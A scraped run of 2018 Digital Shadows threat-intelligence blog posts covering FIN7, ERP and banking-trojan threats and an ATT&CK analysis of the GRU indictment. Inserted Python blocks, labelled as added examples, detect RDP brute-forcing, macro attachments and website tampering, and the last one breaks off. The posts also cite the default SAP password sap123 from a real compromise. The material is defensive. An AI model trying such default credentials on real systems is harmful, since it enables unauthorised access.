While FIN7 also targeted businesses in the United Kingdom, Australia and France, the bulk of its activity was in the United States: the indictment describes more than 15 million customer card records stolen from over 6,500 individual point-of-sale terminals at more than 3,600 separate business locations, spanning 47 US states. That is no surprise, and it is a trend we see across multiple forums and marketplaces. For example, of the 1,249,234 cards for sale on c-v-v[.]su, 998,089 (80%) were from the United States.

A similar story occurs if we count up the mentions of payment cards for sale across two closed forums, Exploit and Verified. Here the United States stands out with over 50% of all the mentions.


Figure 6: Geographies of payment cards discussed on Exploit and Verified forums between May and June 2018


The outlook

These latest charges highlight that the DOJ is picking up speed and treating online payment card fraud as a priority. However, as with the Infraud Forum indictment, these arrests should be viewed in the wider context of what is a very large, well-developed and diffuse criminal ecosystem.

Given the large array of online stores available for cybercriminals to sell stolen card details, it is hard to imagine that the arrest of these three individuals will have a noticeable impact on the threat to merchants, consumers and financial institutions. Likewise, FIN7 is a large operation and the majority of the group’s members remain at large. Finally, because the CARBANAK malware is not bespoke to any one group, payment card theft and other types of data exfiltration will continue as long as this malware and similar tools remain in public circulation.

With FIN7 displaying its adeptness for sophisticated phishing and social engineering techniques, look out for our upcoming blogs in our Five Threats to Financial Services series, where we’ll cover both phishing and payment card fraud in greater detail.

Diversity of Thoughts in the Workplace: Are You Thinking What I’m Thinking? Wed, 01 Aug 2018 16:14:22 +0000 In my most recent blog post I discussed Digital Shadows’ Women’s Network and how it is helping us shape wider conversations on diversity and inclusion. In this blog, I want to unpack diversity of thought and how businesses benefit from a diverse talent pool.

In 2013, Deloitte released a new research report on Diversity of Thought and described this concept as: “The idea that our thinking is shaped by our culture, background, experiences, and personalities”.

By harnessing and promoting the different ways in which we all process information, organizations can reap many tangible benefits. Some of the most significant are:

Increased employee engagement and retention

You’ve hired a diverse workforce…now what? By promoting diversity of thought within management styles, companies can not only retain employees longer, but also provide a more meaningful experience at work, one that’s more personalized to learning preferences and allows employees to play to their strengths.

Decreased groupthink and cognitive dissonance

Deloitte points out that by increasing diversity of thought, employees are less likely to disregard new information or be afraid to challenge the status quo. Your workforce will feel safer to present new ideas and, more importantly, to disagree. In turn, this may also lower cognitive dissonance (e.g. believing one thing, but doing the other).

Ultimately, diversity of thought fosters one of my favorite concepts, psychological safety: a shared belief within a team that its members are safe to take risks, and one of the core indicators of highly effective teams.

Happier clients means more revenue

An article that Glassdoor wrote in 2017 showcases how Diversity and Inclusion programs can directly affect revenue and client success. For example, Hilton empowers leaders to build diverse teams because they are able to harness different skill sets for the unpredictable moments that happen oh so often in a hospitality-driven organization.

As a service-based company ourselves, we value constructive conflict, differences in opinion, and want to further promote the unique backgrounds and traditions our workforce brings.

While the benefits of promoting diversity of thought are clear, it’s not easy to make these changes. Organizations will need strong leadership backing in order to not only train managers on more inclusive management styles, but also to reconsider their organizational policies to ensure they cater to a diverse workforce (flexible working hours, parental leave, etc.).

My most recommended leadership strategy book, Profit from the Positive, promotes the concept of getting the “best” out of your employees, not the “most”. Even more so, keep in mind that the best of one employee is always different than the best of another.


To stay up to date with the latest from Digital Shadows, subscribe to our emails here.

Security Spotlight Series: Dr. Richard Gold Tue, 31 Jul 2018 15:57:48 +0000 Organizations rely on Digital Shadows to be an extension of their security team. Our global team provide the latest tooling, relevant research, much needed context, tailored remediation advice and managed takedown support to make our clients’ jobs easier and more efficient.

In our Security Spotlight Series, we bring our team out of the shadows and into the spotlight. In this edition, we profile Dr Richard Gold, Digital Shadows’ Head of Security Engineering.

Name: Dr. Richard Gold
Team: Security Engineering
Title: Head of Security Engineering

Q: What areas do you focus on as Head of Security Engineering?

A: My team and I work on pre-product development – that is researching interesting and novel security techniques to see how we can integrate them into the product. We also focus on internal security, which includes performing security assessments such as Purple Team exercises, where we model and replicate both offensive and defensive attack techniques in order to learn how to best protect the organization.


Q: How have your past experiences helped you in your role at Digital Shadows?

A: For the last 20 years I have spent a lot of time doing networking, working with operating systems and programming – the three pillars of security engineering. I’ve always had a passion for security since I was a teenager, so working in this field is a dream come true. Doing a PhD also taught me the value of persistence, to keep going even though the solution may be quite far down the line and all hope seems lost.


Q: What have been your highlights working at Digital Shadows?

A: What I really enjoy is having an idea, doing some initial proof-of-concept work and then taking that into production alongside our engineers. Seeing that go live and then provide value to our customer is really exciting. Also, we’ve done a lot of large-scale reconnaissance projects for major financial institutions and enterprise organizations; these were always really instructive experiences to learn what organizations look like from the outside and how attackers use this information to perform their attacks.


Q: How do you see Digital Shadows’ work providing value to customers?

A: Our goal is to protect our clients and help our clients protect themselves. In Security Engineering we try to emulate attacker tradecraft as closely as possible and automate that in a scalable fashion to deliver to our customers. Through our research we seek to reduce our clients’ uncertainty around the risks that they face online.


Q: In your experience, what is the single biggest threat or risk that organizations fail to deal with effectively?

A: Two words: security debt. This is the accumulation of missed patches, unchanged credentials, misconfigurations, and the lack of attack surface reduction typically caused by the scaling issues that appear as organizations grow. These things add up over time to cause some very significant risks to organizations.


Q: What is the most commonly misunderstood problem in cyber security?

A: That you can buy your way to security without putting the time in to really get to know your environment or your tools. Security is all about the details, and that’s a big job. You need to understand how your environment operates, where the flaws are, and how attackers can then take advantage of those flaws.


Q: What advice would you give someone starting out as a security engineer?

A: Learn networking, operating systems and development. Security is really a mindset – it’s about how you view these technical areas. You need to have experience of using, building and maintaining systems to appreciate the challenges.


Q: What is one thing that most people don’t know about you?

A: I have been training traditional Japanese martial arts for over 12 years.


Interested in hearing more from our team? Check out our blogs or subscribe to our weekly threat intelligence podcast, ShadowTalk.


Richard Gold is an information security professional experienced in both offensive and defensive security, as well as security engineering. He has worked for Cisco on web proxies and Secure Development Lifecycles (SDLs), AGT International on Internet of Things/SCADA and, currently, Digital Shadows in various security-related roles. He is particularly interested in open source intelligence (OSINT) reconnaissance, Advanced Persistent Threat (APT) campaigns and offensive security techniques. He is a Certified SCADA Security Architect and holds a PhD in Computer Networking.



ShadowTalk Update – 07.30.2018 Mon, 30 Jul 2018 15:52:34 +0000 Richard Gold and Rose Bernard join Michael Marriott to talk about updates to the Satori botnet, which has expanded to incorporate new IoT devices using TCP port 5555. Amid news of a new wave of OilRig attacks, a Middle Eastern espionage campaign, we dive into PowerShell security risks and provide best-practice advice for those using PowerShell (for more, see our blog on PowerShell security best practices). Finally, we assess the Dragonfly campaign against US power grids and what it all means.



Dragonfly attributed to further attacks targeting energy sector in Europe and North America

The United States Department of Homeland Security has only recently released details of a 2017 campaign that targeted undisclosed United States energy companies. The campaign was orchestrated by suspected Russian nation-state threat group “Crouching Yeti” (aka Dragonfly). The group’s members allegedly conducted spearphishing and watering hole attacks to steal credentials from third-party suppliers, enabling access to United States utility networks. The details may have been released to strengthen the political credibility of United States intelligence services in the eyes of the public and the media; the release occurred during a period of conflict between the intelligence services and the presidential administration about the severity of the Russian cyber threat.


APT-28 parallels attacks on 2016 Presidential elections with attacks on US midterms

Microsoft reported that Russian nation-state linked threat group “APT-28” (aka Fancy Bear) has targeted the United States 2018 mid-term political elections through a phishing campaign against certain undisclosed candidates. The phishing emails were similar to those sent in previous APT-28 campaigns against the Democratic National Committee (DNC) in 2016 prior to the presidential election: both used fake Microsoft domains as command-and-control sites.


LabCorp hit by SamSam ransomware infection

LabCorp, one of the largest clinical laboratory networks in the United States, suffered a “SamSam” ransomware attack. Attackers reportedly gained access by brute-forcing passwords against Remote Desktop Protocol (RDP) services exposed to the Internet. The attack infected approximately 7,000 systems and 1,900 servers, but remediation was implemented quickly and no data was reportedly stolen or misused. SamSam has a lucrative history of use against healthcare entities, as well as against government systems in the city of Atlanta and the Colorado Department of Transportation.
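Password guessing against an exposed RDP service is noisy in the Windows Security log long before the ransomware stage, so it is worth having a detection for it. The following is an added example written for this post, not code from the original article, from LabCorp or from any vendor: it reads constructed lines in the shape of Event ID 4625 (failed logon) and alerts on any source address that accumulates a threshold of failures inside a sliding window. The sample events, the field layout, and the threshold and window values are assumptions to tune for your environment.

```python
"""Flag RDP password-guessing from Windows Security log failed-logon events.

Added example for this blog post; not code from the original article, from
LabCorp or from any vendor. Sample events are constructed inline and mimic
the fields of Event ID 4625. Failed RDP logons are recorded with LogonType
10 (RemoteInteractive), or LogonType 3 when Network Level Authentication
rejects the credentials first, so both are counted. Threshold and window
are assumed starting values."""
from collections import defaultdict, deque
from datetime import datetime, timedelta

RDP_LOGON_TYPES = {"3", "10"}
THRESHOLD = 5                  # failures from one source ...
WINDOW = timedelta(minutes=2)  # ... within this sliding window


def parse_event(line: str) -> dict:
    """Parse 'ISO-timestamp key=value key=value ...' into a dict."""
    ts_text, _, rest = line.partition(" ")
    fields = dict(kv.split("=", 1) for kv in rest.split())
    fields["ts"] = datetime.fromisoformat(ts_text)
    return fields


def detect_bruteforce(lines, threshold=THRESHOLD, window=WINDOW) -> dict:
    """Return {source_ip: alert} for sources exceeding the failure threshold."""
    recent = defaultdict(deque)   # per-source timestamps inside the window
    users = defaultdict(set)      # usernames tried per source
    alerts = {}
    for line in lines:
        ev = parse_event(line)
        if ev.get("EventID") != "4625" or ev.get("LogonType") not in RDP_LOGON_TYPES:
            continue
        ip = ev.get("IpAddress", "-")
        window_q = recent[ip]
        window_q.append(ev["ts"])
        users[ip].add(ev.get("TargetUserName", "").lower())
        while window_q and ev["ts"] - window_q[0] > window:
            window_q.popleft()     # expire failures older than the window
        if len(window_q) >= threshold and ip not in alerts:
            alerts[ip] = {"first_seen": window_q[0],
                          "failures": len(window_q),
                          "usernames": sorted(users[ip])}
    return alerts


# Constructed sample: one spraying source, one legitimate user, one stray typo.
SAMPLE_EVENTS = [
    "2018-07-14T02:13:07 EventID=4625 LogonType=10 TargetUserName=Administrator IpAddress=203.0.113.7",
    "2018-07-14T02:13:09 EventID=4625 LogonType=10 TargetUserName=admin IpAddress=203.0.113.7",
    "2018-07-14T02:13:12 EventID=4625 LogonType=3 TargetUserName=labadmin IpAddress=203.0.113.7",
    "2018-07-14T02:13:14 EventID=4625 LogonType=10 TargetUserName=backup IpAddress=203.0.113.7",
    "2018-07-14T02:13:15 EventID=4624 LogonType=10 TargetUserName=jsmith IpAddress=10.0.0.5",
    "2018-07-14T02:13:17 EventID=4625 LogonType=10 TargetUserName=sqlsvc IpAddress=203.0.113.7",
    "2018-07-14T02:13:20 EventID=4625 LogonType=10 TargetUserName=Administrator IpAddress=203.0.113.7",
    "2018-07-14T02:14:01 EventID=4625 LogonType=2 TargetUserName=jsmith IpAddress=127.0.0.1",
    "2018-07-14T02:20:00 EventID=4625 LogonType=10 TargetUserName=jsmith IpAddress=192.0.2.10",
    "2018-07-14T02:40:00 EventID=4625 LogonType=10 TargetUserName=jsmith IpAddress=192.0.2.10",
]

if __name__ == "__main__":
    for ip, alert in detect_bruteforce(SAMPLE_EVENTS).items():
        print(ip, alert)
```

The many-usernames-from-one-source pattern is what separates guessing from a user who has forgotten a password; the better fix remains not exposing RDP to the Internet at all, and putting it behind a VPN or gateway with multi-factor authentication.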


Attackers steal 1.5 million patient records from Singapore healthcare group

Singapore’s Ministry of Health released a statement detailing the theft of 1.5 million patient records from a healthcare group in that country. Attackers used privileged credentials to access a database, although the original infection vector remains unknown. Attacks on healthcare providers are increasing, as financially motivated threat actors seek information that is easily monetized on the dark Web; patient details can be re-sold and used for other fraudulent activities, or to tailor spearphishing campaigns.

Black Hat USA 2018 Thu, 26 Jul 2018 16:48:41 +0000 Black Hat USA 2018 is quickly approaching! The conference, one of the world’s leading Information Security events, focuses on the latest in research, development, and trends. In this blog, I’ll give a quick overview of what we’ll be up to at this year’s event.

Come Meet The Digital Shadows Team

At Black Hat USA 2018, our team will be available to walk you through how we help our clients quickly identify risks such as data loss, brand impersonation, cyber threats, credential exposure, and more across the open, deep, and dark web. We’ll also be sharing the results from the recent 2018 Forrester New Wave for Digital Risk Protection, in which we were named a “Leader”. Get your free copy of the report here to see the results ahead of the event.

If you’re interested in a quick chat with our team, book time with us here or visit us at Booth 1627 in the Business Hall. 


Learn About Our Research

This week, our research team produced a new report which outlined the threat landscape for ERP applications. Download your copy of the report here or stop by Booth 1627 in the Business Hall at Black Hat to chat with us on these findings and our other threat intelligence research.


Party with us on Wednesday Night at Eyecandy Sound Lounge

On Wednesday night, we’re throwing a big party in the center of the casino floor at Mandalay Bay. Stop by our Security Leaders VIP Party at Eyecandy Sound Lounge from 8-10pm for food, music, and a full open bar. We do expect to hit capacity, so make sure to get on the list now!


For all further information regarding Black Hat 2018, check out our dedicated event page here. Hope to see you in Las Vegas!

Cyber Threats to ERP Applications: Threat Landscape Tue, 24 Jul 2018 22:52:17 +0000 What are ERP Applications?

Organizations rely on Enterprise Resource Planning (ERP) applications to support business processes. This includes payroll, treasury, inventory management, manufacturing, financial planning, sales, logistics and billing. All of this can be an attractive target for threat actors. In our joint research report with Onapsis, ERP Applications Under Fire, we assess the threat landscape for two of the largest ERP applications: SAP and Oracle E-Business. The report outlines the scale of Internet-facing applications out there, the growing number of exploited vulnerabilities, and specific campaigns targeting these applications.

History of Attacks

It’s no surprise that actors target these ERP applications, given the trove of sensitive data they provide access to and the increasing number of public exploits available: through our research we observed a 100% increase in public exploits for SAP and Oracle ERP applications over the last three years. One of the best-known instances occurred back in March 2014, when it was revealed that the breach of US Investigations Services (USIS) began through an exploited SAP vulnerability. The investigation found that Chinese actors exploited a zero-day vulnerability, resulting in the exposure of thousands of sensitive records on individuals’ security clearance applications. But how has the threat landscape developed aside from these campaigns? A variety of different actors, including hacktivists, cybercriminals and nation state-affiliated groups, have continued targeting SAP and Oracle ERP applications. In this blog, I’ll focus on the cybercriminal element.

Banking Trojans Expand to Target Credentials of ERP Users

Banking trojans typically target the customers of banks with the aim of harvesting their online banking credentials. The trojan commonly ships with configuration files that specify which URLs (normally bank logon pages) to intercept or redirect. However, given the sensitive financial information that ERP platforms hold, trojans have also targeted the logon information of SAP platforms.

One of the most common banking trojan variants is Dridex, which has undergone multiple iterations since its emergence in 2014. In February 2017, one Dridex botnet updated its configuration to target SAP users. This was extended in February 2018 to include two more botnets that distributed the Dridex trojan. In this particular campaign, a malicious Microsoft Word document was delivered that downloaded Dridex on a victim’s machine. With “saplogon” in the configuration files, the malware would look for users running this software, and then harvest their credentials.


Figure 1: A Dridex 4 configuration file posted online in February 2018

Poor Password Hygiene Offers Opportunities for Cybercriminals

With criminal sites like UAS-Service and Xdedic, there is a long-standing market for compromised Remote Desktop Protocol (RDP) access. An RDP foothold offers cybercriminals a wealth of options, including installing keyloggers and ransomware, and such access is frequently obtained through weak or default passwords. SAP applications are no exception, especially where organizations run legacy platforms that were installed with weak default passwords that were never changed.

In October 2017, users on a criminal forum shared details of a compromised Remote Desktop (RDP) session on an SAP HANA system. The password given for the RDP access was sap123, a default SAP password, demonstrating the need for good password hygiene.


Figure 2: Compromised Remote Desktop Protocol offered on criminal forum, including the use of a default SAP password


Cybercriminals are only one type of actor to have displayed a propensity to target ERP applications. Download the full report, ERP Applications Under Fire, to learn more about the exposure of ERP platforms, other types of adversaries targeting them, and ways to mitigate these threats.

To stay up to date with the latest Digital Shadows threat intelligence and news, subscribe to our threat intelligence emails here.

ShadowTalk Update – 07.23.2018 Mon, 23 Jul 2018 14:05:51 +0000 In this week’s ShadowTalk, we discuss the Robert Mueller indictment against 12 Russian individuals for alleged US election interference. However, rather than dwell on issues of attribution and geopolitics, we focus on the detailed tactics, techniques and procedures laid out in the indictment. Katie Nickels, a member of the MITRE team, joins Rafael Amado and Richard Gold to discuss the ATT&CK™ framework in greater detail, as well as the key lessons that organizations can take away.


APT-28 shifts focus to Italian defense sector with new X-Agent variant

A new variant of the “X-Agent” backdoor malware was identified in a campaign targeting defense entities in Italy. The highly programmable malware has been associated with APT-28 (aka Fancy Bear, Sofacy, Pawn Storm, Sednit), and was previously observed in attacks targeting the Democratic National Committee in 2016.

Banking trojans distributed via Google Play store

Malware distributors used downloader apps hosted on the Google Play store to target Turkish-speaking Android users with variants of the Marcher and BankBot Anubis banking trojans. Placing a downloader on an app store, rather than the malware itself, is a tactic adopted by cybercriminals because downloaders appear innocuous and are less likely to trigger the store’s security checks. This campaign was potentially part of a cybercrime-as-a-service offering, as significant resources were invested in the fraudulent apps that masked the downloaders. Official app stores remain a prized target for malware distributors: they offer a wider audience of potential victims and abuse the trust users place in the legitimate download source.


Theft at cryptocurrency exchange raises questions over regulations

An unknown threat actor has stolen approximately USD 13.5 million from Israeli cryptocurrency exchange, Bancor. Although no details about the attacker’s tactics have been released, some security researchers have alleged that the attackers exploited permissioned backdoors used by Bancor to freeze and control transactions. This has highlighted the lack of regulation of exchanges, something which is likely to continue to drive criminal attacks against the sector, which they perceive to be a low-risk high-reward target.


Sub-group of Lazarus Group observed conducting reconnaissance against South Korean government entities

Trend Micro identified reconnaissance activity which was likely a prelude to a watering hole attack targeting government entities in South Korea. The activity was attributed to a branch of the Lazarus Group, known as “Andariel Group”, and aligns with previous Lazarus Group activity. The attackers sought information on specific ActiveX objects, including two software programs known to be used by South Korean government institutions. The group were previously observed conducting similar reconnaissance in January 2017, following which, a targeted watering hole attack using a zero-day exploit was conducted in April 2017.


To stay up to date with the latest Digital Shadows threat intelligence and news, subscribe to our threat intelligence emails here.

Five Threats to Financial Services: Banking Trojans Thu, 19 Jul 2018 16:42:51 +0000 A couple of weeks ago, we learned of a new phishing campaign delivering Trickbot in an attempt to harvest the credentials of online banking customers. This latest wave targeted UK users, with emails purporting to come from HMRC (HM Revenue & Customs). The actors exploited a Windows VBScript engine vulnerability reachable through Internet Explorer (CVE-2018-8174), for which a patch was released in May 2018. Banking trojans constitute a significant threat to banking customers and small businesses. In this blog – the second in a series on threats to financial services – we delve into the threat of banking trojans in more detail.

What is a Banking Trojan?

A banking trojan is a form of malware that seeks to collect the credentials of online banking customers from infected machines. The malware is delivered through a variety of mechanisms, exploits a range of vulnerabilities, and increasingly incorporates additional functionality.

One of the oldest variants is Zeus, a trojan first spotted in 2007 in a campaign targeting the US Department of Transportation, that has since grown in popularity. Zeus’ author reportedly retired in 2010 and the Zeus source code was leaked the following year, giving way to a swathe of alternative variants.

Trickbot is one of many banking trojans active in 2018; others include Ursnif, Dridex, Retefe and Panda. As shown below, these are delivered in a variety of ways, including spam botnets such as Necurs (typically through phishing campaigns) and exploit kits such as RIG (typically drive-by downloads from a compromised website or malvertising). Once delivered, often via spam email, many variants rely on users opening malicious Microsoft Word documents. Some variants, such as Retefe, have also leveraged ETERNALBLUE, an exploit for the SMBv1 vulnerability CVE-2017-0144, to spread within a network.


Variant | Delivery | Distribution | Recent Targets | Exploited Vulnerabilities
Ursnif | Spam emails | Necurs botnet; RIG exploit kit | Japan; New Zealand; Australia; US; Canada; Italy | CVE-2018-10730; CVE-2018-10731
Dridex | Spam emails; malicious Microsoft Office documents | Necurs botnet; compromised FTP servers | UK; US | CVE-2017-0199
Retefe | Spam emails; malicious Microsoft Office documents | Unknown | UK; Switzerland; Austria | CVE-2017-0144
Trickbot | Spam emails; IcedID downloader | Qtbot; RIG exploit kit | Global | CVE-2018-8174; CVE-2017-0144; CVE-2017-11882
Panda Zeus | Spam emails; MSG attachments | Social media phishing; DeLoader malware dropper | Japan; US | CVE-2014-1761; CVE-2012-0158


Table 1: Overview of most prominent banking trojans in 2018

 Protecting Yourself Against Banking Trojans

With malware developers rapidly adding new functionality to these variants, keeping up to date with the threat posed by banking trojans is challenging. Understanding the common ways in which the trojans are delivered and infect a machine, however, helps you make more informed decisions about security controls and patch priorities.

Organizations should look at deploying a defense-in-depth strategy to protect against initial infection and for post-infection. A strategy for defense should use a blend of technical and non-technical controls in order to be most effective. Some of the components that should be used include:

  1. Provide awareness and training for staff who may be the end users targeted by banking trojans. Staff should be made aware of the threat of banking trojans (and malware in general), how it is delivered, and information security principles and techniques.
  2. Open channels for staff to be able to report suspected phishing attempts. This should be a way for users to openly and easily report suspect emails and files, and receive validation prior to opening. This ensures that the user does not infect themselves or the organization, but can also provide security operations signatures to better protect others in the organization.
  3. Ensure operating systems, software and firmware on devices are kept patched and updated as vulnerabilities are discovered. A centralized patch management system may facilitate this process. Prioritizing recently exploited vulnerabilities, such as CVE-2018-8174, should be a focus.
  4. Use an email filtering system or service to identify phishing threats, particularly around malicious attachments. Office365 users should consider Microsoft’s Advanced Threat Protection (ATP), a cloud-based email filtering service. This will help prevent malware delivery through email phishing campaigns with malicious payloads or links.
  5. Ensure anti-virus (AV) software is installed on end-points and kept regularly updated with scans carried out regularly. Most AV solutions can be set to automatically update and scan.
  6. Manage the use of privileged accounts and ensure the principle of least privilege is implemented. Administrative access should be reserved only for those who require it. Those employees should only use the accounts when required and use regular user accounts for daily tasks. The principle of least privilege should also be applied to file, directory, and network share permissions.
  7. Disable macros from Office files transmitted via e-mail. Consider using the Outlook preview pane to open Microsoft Office files transmitted via e-mail instead of full Office suite applications.
  8. Prevent access to malicious websites, including the downloading of the malware installed during these attacks. Blocking access to the Tor network and I2P sites may also be a useful technique in blocking the malware’s command and control (C&C) communications and can help prevent the initial malware drop.
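Points 4 and 7 above come down to a single question a mail gateway has to answer for every Office attachment: does this file carry VBA macros, regardless of what its extension claims? The following is an added example (not Digital Shadows code, and not tied to any particular filtering product) that answers that question for the zip-based OOXML formats (.docx/.docm, .xlsx/.xlsm, .pptx/.pptm). The sample attachments are constructed in memory and contain only the package parts the check inspects; the filenames are placeholders.

```python
"""Detect VBA macros inside OOXML (.docx/.docm/.xlsx/.xlsm/.pptx/.pptm) attachments.

Added example, not from the original post. The sample attachments are built
in memory below and contain only the package parts the check looks at.
"""
import io
import zipfile

# Content types that only appear in macro-enabled packages.
MACRO_CONTENT_TYPES = (
    "application/vnd.ms-office.vbaProject",
    "application/vnd.ms-word.document.macroEnabled.main+xml",
    "application/vnd.ms-word.template.macroEnabledTemplate.main+xml",
    "application/vnd.ms-excel.sheet.macroEnabled.main+xml",
    "application/vnd.ms-powerpoint.presentation.macroEnabled.main+xml",
)
# Extensions that promise a macro-free document.
MACRO_FREE_EXTENSIONS = {"docx", "dotx", "xlsx", "xltx", "pptx", "potx"}


def inspect_ooxml(filename, data):
    """Return a verdict dict for one attachment blob."""
    verdict = {"filename": filename, "ooxml": False, "has_macros": False,
               "extension_mismatch": False, "reasons": []}
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            names = zf.namelist()
            if "[Content_Types].xml" not in names:
                return verdict            # a zip, but not an Office package
            content_types = zf.read("[Content_Types].xml").decode("utf-8", "replace")
    except zipfile.BadZipFile:
        return verdict                    # legacy OLE2 .doc/.xls, or not Office at all
    verdict["ooxml"] = True
    # 1. A vbaProject.bin part anywhere in the package means macros are present.
    vba_parts = [n for n in names if n.lower().endswith("vbaproject.bin")]
    if vba_parts:
        verdict["has_macros"] = True
        verdict["reasons"].append("VBA part present: " + ", ".join(vba_parts))
    # 2. The content-type manifest declares a macro-enabled main part or a VBA part.
    declared = [ct for ct in MACRO_CONTENT_TYPES if ct in content_types]
    if declared:
        verdict["has_macros"] = True
        verdict["reasons"].append("macro content type declared: " + declared[0])
    # 3. Macros inside a file whose extension says there are none (renamed .docm etc.).
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if verdict["has_macros"] and ext in MACRO_FREE_EXTENSIONS:
        verdict["extension_mismatch"] = True
        verdict["reasons"].append("macros in a .%s (expected .%sm)" % (ext, ext[:-1]))
    return verdict


def should_quarantine(filename, data):
    """Gateway policy for point 7 above: hold any Office attachment that carries macros."""
    return inspect_ooxml(filename, data)["has_macros"]


# --- constructed sample attachments (minimal packages, not real documents) ---
def _package(parts):
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, body in parts.items():
            zf.writestr(name, body)
    return buf.getvalue()


_CT_NS = 'xmlns="http://schemas.openxmlformats.org/package/2006/content-types"'
CT_PLAIN = ('<Types %s><Override PartName="/word/document.xml" ContentType='
            '"application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"/>'
            '</Types>' % _CT_NS)
CT_MACRO = ('<Types %s><Override PartName="/word/document.xml" ContentType='
            '"application/vnd.ms-word.document.macroEnabled.main+xml"/>'
            '<Override PartName="/word/vbaProject.bin" ContentType='
            '"application/vnd.ms-office.vbaProject"/></Types>' % _CT_NS)

CLEAN_DOCX = _package({"[Content_Types].xml": CT_PLAIN, "word/document.xml": "<w:document/>"})
INVOICE_DOCM = _package({"[Content_Types].xml": CT_MACRO, "word/document.xml": "<w:document/>",
                         "word/vbaProject.bin": b"constructed stub, not a real VBA project"})

if __name__ == "__main__":
    for name, blob in (("invoice.docx", CLEAN_DOCX), ("invoice.docm", INVOICE_DOCM),
                       ("invoice.docx", INVOICE_DOCM)):
        print(name, should_quarantine(name, blob), inspect_ooxml(name, blob)["reasons"])
```

The third sample is the case worth watching for: a macro-enabled package renamed to .docx. Legacy binary formats (.doc, .xls) are OLE2 containers rather than zips, so this check reports them as non-OOXML; a gateway policy needs a separate OLE2 parser (olevba from oletools is the usual choice) or should simply hold those formats for review.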


For finance organizations, banking trojans targeting their employees and customers will be a concern. By taking these steps, organizations and individuals can better protect their sensitive logon information.


Stay tuned for our future blogs on other threats to financial services.


To stay up to date with the latest Digital Shadows threat intelligence and news, subscribe to our threat intelligence emails here.

Mitre ATT&CK™ and the Mueller GRU Indictment: Lessons for Organizations Tue, 17 Jul 2018 16:37:24 +0000 A recent indictment revealed how the GRU (Russia’s Military Intelligence agency) used both influence operations and network intrusions to achieve its policy aims. More precisely, the GRU weaponized the use of the network intrusions in its influence operations. The indictment goes into detail about the TTPs (Tactics, Techniques and Procedures) used by the attackers and it is worthwhile to pay careful attention to the adversary tradecraft that was used and how it can be defended against. For this blog we have used the MITRE ATT&CK™ framework as our methodology to play back the findings of the indictment. In doing so, we aim to provide key lessons organizations can take away from this indictment.

Not all organizations share the same threat model and so not all organizations are high-profile targets for nation-state cyber operations. However, the TTPs used are shared among many different classes of actors, including cybercriminals, and also provide a taste for what many actors will be using to perform intrusions in the future.

Stage #1: Reconnaissance

PRE-ATT&CK TTPs: All techniques

The GRU performed the following tasks:

  • Social media reconnaissance to identify targets for spearphishing emails
  • “[R]esearched the DCCC (Democratic Congressional Campaign Committee) and DNC (Democratic National Committee) computer networks to identify technical specifications and vulnerabilities”
  • “[R]an a technical query for the DCCC’s internet protocol configurations to identify connected devices”

DS Mitigation advice: Inform employees that their social media profiles may be of interest to adversaries. Provide advice on how to lock down profiles if requested. Ensure that network services are patched and running supported versions of software. Credentials, especially for admin accounts, should use strong passwords and two factor authentication (2FA) should be enabled wherever possible.


Stage #2 Initial Access

Four TTPs were used by the GRU to perform the initial compromise:

1.   ATT&CK TTP: Spearphishing attachment, Spearphishing link

Unsurprisingly spearphishing is still the go-to tactic of many threat actor groups as it has proven to be so successful in the past. The GRU uses spearphishing in a variety of ways.

  1. A target company was compromised and that company’s branding, and presumably its address book, was used to target its customers. The branding reuse is an effective technique to lend legitimacy to a social engineering attack.
  2. A URL-shortener service was used in order to masquerade as a legitimate service and to redirect targets to credential harvesting sites. These credentials were then reused in later stages of the attack.
  3. The targeting of personal accounts.
  4. Fake document lures.

DS Mitigation advice: Use of an email filtering system or service can help to identify some spearphishing threats particularly around malicious attachments. Office365 users should consider Microsoft’s Advanced Threat Protection (ATP), a cloud-based email filtering service. 2FA is essential for email accounts, especially with a security key where possible. Employees should be made aware that personal accounts are regularly targeted by certain adversaries and to not enter credentials online unless they are expecting to do so.


2.   ATT&CK TTP: Trusted Relationship

Once the GRU had gained access to the DCCC network, it then proceeded to use that access to attack the DNC network. It used the keylogging and screenshot capabilities of its X-Agent malware in order to capture credentials, which it then proceeded to reuse.

DS Mitigation advice: Third parties, such as suppliers and partner organizations, typically have privileged access via a trusted relationship into certain environments. These relationships can be abused by attackers to subvert security controls and gain unauthorized access into target environments. Managing trusted relationships, like supply chains, is an incredibly complex topic. The NCSC (National Cyber Security Centre) has an excellent overview of this challenging topic.


3.   ATT&CK TTP: Valid Accounts

The GRU used credentials stolen through a spearphishing attack to log in to the DCCC network. Our assessment is that RDP (Remote Desktop Protocol) is an ideal target for reusing stolen credentials.

DS Mitigation advice: Access to RDP servers and other servers that provide remote access should be limited. IP whitelisting where appropriate is an effective control. Another method is to ensure that RDP is only accessible via a VPN that supports strong authentication.


4.   ATT&CK TTP: Drive-by Compromise

The GRU edited the target’s own website and “the Conspirators registered the domain actblues[.]com, which mimicked the domain of a political fundraising platform that included a DCCC donations page. Shortly thereafter, the Conspirators used stolen DCCC credentials to modify the DCCC website and redirect visitors to the actblues[.]com domain”.

DS Mitigation advice: Change management and file integrity monitoring (FIM) for websites and other external assets is an important part of ensuring that no unauthorized changes are made. For users, ensuring that browsers are patched to the latest version, vulnerable plugins are disabled and an adblocker is used, are important steps to staying safe while browsing.
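The website modification above is exactly what file integrity monitoring exists to catch: a page that should only change through a deploy suddenly differs from its baseline, and the difference is a redirect. What follows is an added example (not Digital Shadows code, and not a description of any commercial FIM product) of the core of such a check: hash the web root, store the manifest, diff it later, and run a simple redirect heuristic over whatever changed. The demo builds a throwaway web root in a temporary directory; the look-alike domain it injects is a placeholder.

```python
"""Baseline-and-diff file integrity check for a web root, with a redirect heuristic.

Added example, not from the original post. demo() builds a throwaway web root
in a temp directory; the injected redirect target is a placeholder name.
"""
import hashlib
import os
import re
import tempfile


def hash_tree(root):
    """Map every file under root (path relative to root) to its SHA-256 digest."""
    manifest = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            h = hashlib.sha256()
            with open(full, "rb") as fh:
                for chunk in iter(lambda: fh.read(1 << 16), b""):
                    h.update(chunk)
            manifest[rel] = h.hexdigest()
    return manifest


def diff_manifests(baseline, current):
    """Report files added, removed or changed since the baseline was taken."""
    return {
        "added": sorted(set(current) - set(baseline)),
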